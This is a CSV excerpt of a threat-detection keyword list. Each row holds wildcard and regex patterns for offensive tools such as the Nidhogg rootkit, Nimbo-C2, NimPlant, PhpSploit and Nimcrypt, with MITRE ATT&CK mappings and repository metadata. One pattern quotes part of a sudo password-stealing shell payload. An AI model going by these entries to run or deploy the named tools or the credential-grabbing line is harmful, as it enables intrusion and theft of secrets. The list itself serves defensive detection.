"*Nidhogg::RegistryUtils::NidhoggRegistryQueryHiddenValues*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryHiddenValues.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53374"
"*Nidhogg::RegistryUtils::NidhoggRegistryQueryProtectedKeys*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryProtectedKeys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53375"
"*Nidhogg::RegistryUtils::NidhoggRegistryQueryProtectedValues*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryProtectedValues.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53376"
"*Nidhogg::RegistryUtils::NidhoggRegistryUnhideKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnhideKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53377"
"*Nidhogg::RegistryUtils::NidhoggRegistryUnhideValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnhideValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53378"
"*Nidhogg::RegistryUtils::NidhoggRegistryUnprotectValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnprotectValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53379"
"*Nidhogg-0.1.zip*",".{0,1000}Nidhogg\-0\.1\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53380"
"*Nidhogg-0.2.zip*",".{0,1000}Nidhogg\-0\.2\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53381"
"*Nidhogg-0.3.zip*",".{0,1000}Nidhogg\-0\.3\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53382"
"*Nidhogg-0.4.zip*",".{0,1000}Nidhogg\-0\.4\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53383"
"*Nidhogg-0.5.zip*",".{0,1000}Nidhogg\-0\.5\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53384"
"*NidhoggClient.exe *",".{0,1000}NidhoggClient\.exe\s.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53385"
"*NidhoggExample.cpp*",".{0,1000}NidhoggExample\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53386"
"*Nidhogg-master*",".{0,1000}Nidhogg\-master.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53387"
"*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*",".{0,1000}nIFS\=.{0,1000}\sread\s\-s\spass\\necho\s\-e\s.{0,1000}User\=.{0,1000}\$\(whoami\).{0,1000}Password\=.{0,1000}\$pass.{0,1000}\>\s\/var\/tmp.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","#linux","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53388"
"*nightCrawler.ps1 *",".{0,1000}nightCrawler\.ps1\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","53389"
"*Nightmangle-master*",".{0,1000}Nightmangle\-master.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","53390"
"*nikto -C all *",".{0,1000}nikto\s\-C\sall\s.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","53391"
"*nikto/program*",".{0,1000}nikto\/program.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","53392"
"*nil0x42/phpsploit*",".{0,1000}nil0x42\/phpsploit.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","53393"
"*NimBlackout*.exe*",".{0,1000}NimBlackout.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","53394"
"*NimBlackout.*",".{0,1000}NimBlackout\..{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","53395"
"*NimBlackout-main*",".{0,1000}NimBlackout\-main.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","53396"
"*nimbo_main*",".{0,1000}nimbo_main.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53397"
"*nimbo_prompt_color*",".{0,1000}nimbo_prompt_color.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53398"
"*nimbo_root*",".{0,1000}nimbo_root.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53399"
"*Nimbo-C2 w1ll r0ck y0ur w0rld*",".{0,1000}Nimbo\-C2\sw1ll\sr0ck\sy0ur\sw0rld.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53400"
"*Nimbo-C2*",".{0,1000}Nimbo\-C2.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53401"
"*Nimbo-C2.*",".{0,1000}Nimbo\-C2\..{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53402"
"*nimbo-dependencies*",".{0,1000}nimbo\-dependencies.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53403"
"*nimbuspwn.py*",".{0,1000}nimbuspwn\.py.{0,1000}","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","1","#linux","N/A","N/A","1","22","7","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z","53404"
"*nimcrypt -*",".{0,1000}nimcrypt\s\-.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","53405"
"*nimcrypt --file *",".{0,1000}nimcrypt\s\-\-file\s.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","53406"
"*nimcrypt.nim*",".{0,1000}nimcrypt\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","53407"
"*NimDllSideload-main*",".{0,1000}NimDllSideload\-main.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","53408"
"*NimExec.exe*",".{0,1000}NimExec\.exe.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","53409"
"*NimExec-master*",".{0,1000}NimExec\-master.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","53410"
"*NimPackt.py -i *",".{0,1000}NimPackt\.py\s\-i\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","53411"
"*NimPlant v*",".{0,1000}NimPlant\sv.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53412"
"*nimplant-*",".{0,1000}nimplant\-.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53413"
